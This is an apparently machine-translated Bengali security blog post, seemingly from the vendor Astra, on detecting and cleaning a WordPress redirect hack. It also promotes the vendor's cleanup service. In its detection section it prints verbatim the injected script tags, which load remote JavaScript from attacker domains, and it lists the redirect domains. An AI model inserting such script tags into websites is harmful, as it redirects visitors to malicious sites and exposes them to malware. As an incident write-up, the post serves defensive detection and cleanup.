ভিজিটররা ওয়ার্ডপ্রেস ব্লগ থেকে ক্ষতিকারক ডোমেনে পুনঃনির্দেশ করছেন? এখনই সমাধান করুন

ওয়ার্ডপ্রেস রিডাইরেক্ট হ্যাক এখন এত দীর্ঘ সময়ের জন্য একটি হুমকি হয়ে দাঁড়িয়েছে। এটি প্রতি কয়েক সপ্তাহে নতুন রিডাইরেক্ট হ্যাকগুলিতে নিজেকে রূপান্তরিত করে। আমরা ওয়ার্ডপ্রেস রিডাইরেক্টের সমস্ত ধরণের কভার করেছি এবং যখন সেগুলি আসে। তালিকায় যোগ করা হচ্ছে এই ব্লগ পোস্ট যা আরেকটি ওয়ার্ডপ্রেস রিডাইরেক্ট হ্যাক টাইপ উন্মোচন করে। এই হ্যাক ব্লগ পৃষ্ঠার দর্শকদের দূষিত ডোমেনে পুনঃনির্দেশ করে।

কিছু ক্ষতিকারক ডোমেনের মধ্যে রয়েছে adaranth[com], buyittraffic[com], cuttraffic[com], statistic[.]admarketlocation[.]com, planeobservetoo1[.]লাইভ , ইত্যাদি।

আপনি সংক্রামিত কিনা তা কিভাবে পরীক্ষা করবেন?

1. লক্ষণগুলি পর্যবেক্ষণ করুন

• অবাঞ্ছিত ডোমেনে পুনঃনির্দেশিত দর্শক।
• আপনার ব্লগ পৃষ্ঠাগুলির জন্য Google র‌্যাঙ্কিং কমে যাচ্ছে।
• অবৈধ সাইট আচরণের জন্য আপনি Google থেকে সতর্কতা বার্তা পেয়েছেন।
• আপনার ওয়েবসাইট কালো তালিকাভুক্ত করা হয়েছে। আপনি এই ব্ল্যাকলিস্ট চেকার টুল দিয়ে সহজেই এটি পরীক্ষা করতে পারেন।
• ওয়েব পৃষ্ঠার সোর্স কোডে ক্ষতিকারক লিঙ্ক রয়েছে৷
৷

আপনি যদি উপরের উপসর্গগুলির মধ্যে কোনটি লক্ষ্য করেন তবে আপনার ওয়েবসাইট হ্যাক করা হয়েছে।

ওয়ার্ডপ্রেস ব্লগ পুনঃনির্দেশ করা হচ্ছে? এখনই ঠিক করুন!

2. একটি ম্যালওয়্যার স্ক্যানার দিয়ে পরীক্ষা করুন

হ্যাক নিশ্চিত করার আরেকটি উপায় হল ম্যালওয়্যার স্ক্যানার দিয়ে আপনার ওয়েবসাইট স্ক্যান করা। আপনি এর জন্য একটি অনলাইন ম্যালওয়্যার স্ক্যানার ব্যবহার করতে পারেন। শুধু আপনার ওয়েবসাইটের URL লিখুন এবং স্ক্যান করুন টিপুন .

হ্যাকটি কীভাবে সনাক্ত করবেন?

প্রায় সব রিডাইরেক্ট হ্যাকের পিছনে একই সূত্র কাজ করে – ডাটাবেস বা মূল ফাইলে ক্ষতিকারক কোড ইনজেকশন। এটি আলাদা ছিল না।

হ্যাক বিশ্লেষণ করার পর, আমরা এই সিদ্ধান্তে উপনীত হই যে হ্যাকার অবশ্যই ডাটাবেসে ক্ষতিকারক কোডটি ইনজেক্ট করেছে।

হ্যাকাররা wp_posts-এ একটি JS কোড ঢুকিয়ে দেওয়ার সম্ভাবনা বেশি। ডাটাবেসের টেবিল (যেটিতে ওয়েবসাইটের প্রতিটি পোস্ট রয়েছে)।

এইভাবে আপনি আপনার ডাটাবেস চেক করতে পারেন:

1. PHPMyAdmin দিয়ে আপনার ডাটাবেস অ্যাক্সেস করুন।
2. wp_posts-এ যান টেবিল পুনঃনির্দেশিত পোস্টে যান এবং পোস্টে (Ctrl + F) “adaranth[com]” (বা অন্যান্য ক্ষতিকারক ডোমেন) অনুসন্ধান করুন।

দূষিত কোডের একটি উদাহরণ:

<script src=“https://trafficpage.cool/addons/lnkr5.min.js” type=“text/javascript“></script><script src=“https://trafficpage.cool/addons/lnkr30_nt.min.js” type=“text/javascript“></script><script src=“https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x5953x&amp;r=1536317274530” type=“text/javascript“></script>

একটি হ্যাক করা ওয়েবসাইটে পাওয়া আরেকটি দূষিত স্ক্রিপ্ট এইরকম কিছু দেখায়:

<script src=’https://dl.gotosecond2.com/clizkes' type=‘text/javascript’></script>

এরপর কি করতে হবে?

সংক্রমণ পরিষ্কার করুন এবং আপনার ওয়েবসাইট সুরক্ষিত করুন৷

আপনি ম্যালওয়্যার পরিষ্কার করতে যত দেরি করবেন, তত বেশি ক্ষতি হবে। Astra এর অবিলম্বে ম্যালওয়্যার ক্লিনআপ প্রোগ্রামটি বেছে নিন এবং আপনি সাইন আপ করার দিনেই আপনার ওয়েবসাইটটি পরিষ্কার করুন৷ Astra দ্বারা একটি পেশাদার ম্যালওয়্যার ক্লিনআপ পেতে:

1. অস্ট্রার ম্যালওয়্যার ক্লিনআপ প্রোগ্রামের জন্য সাইন আপ করুন
2. আপনার সার্ভারের শংসাপত্র আপডেট করুন এবং এটিই।

আমাদের নিরাপত্তা প্রকৌশলী আপনার ওয়েবসাইট থেকে 6-8 ঘন্টার মধ্যে সংক্রমণ, সমস্ত লুকানো ব্যাকডোর পরিষ্কার করবেন। ভবিষ্যতে এই ধরনের আক্রমণ থেকে সুরক্ষা নিশ্চিত করার জন্য Astra-এর হ্যাকারের পরীক্ষিত ফায়ারওয়াল তারপরে আপনার ওয়েবসাইটের পোস্ট-ক্লিনআপে স্থাপন করা হবে৷

উপসংহার

আপনার ওয়েবসাইট পরিষ্কার এবং নিখুঁতভাবে চালানোর পরে, প্রস্তাবিত ওয়ার্ডপ্রেস নিরাপত্তা সর্বোত্তম অনুশীলন অনুসরণ করে এর নিরাপত্তা নিশ্চিত করুন। যার মধ্যে কয়েকটি হল:

• আপনার ওয়েবসাইট এবং সার্ভারে সমস্ত অ্যাকাউন্টের জন্য শুধুমাত্র শক্তিশালী পাসওয়ার্ড তৈরি করুন এবং ব্যবহার করুন। এছাড়াও, প্রায়ই সেগুলি পরিবর্তন করুন৷
• ডিফল্ট অ্যাডমিন URL কে অস্বাভাবিক কিছুতে পরিবর্তন করুন।
• সঠিক ওয়ার্ডপ্রেস ফাইল এবং ফোল্ডার অনুমতি সেট করুন
• আপনার অ্যাডমিন এলাকা সীমাবদ্ধ করুন।
• লগইন প্রচেষ্টা সীমিত করুন, ইত্যাদি।

প্রোগ্রাম বা Astra সম্পর্কে কোন প্রশ্ন আছে? আমাদের সাথে একটি চ্যাট পেতে.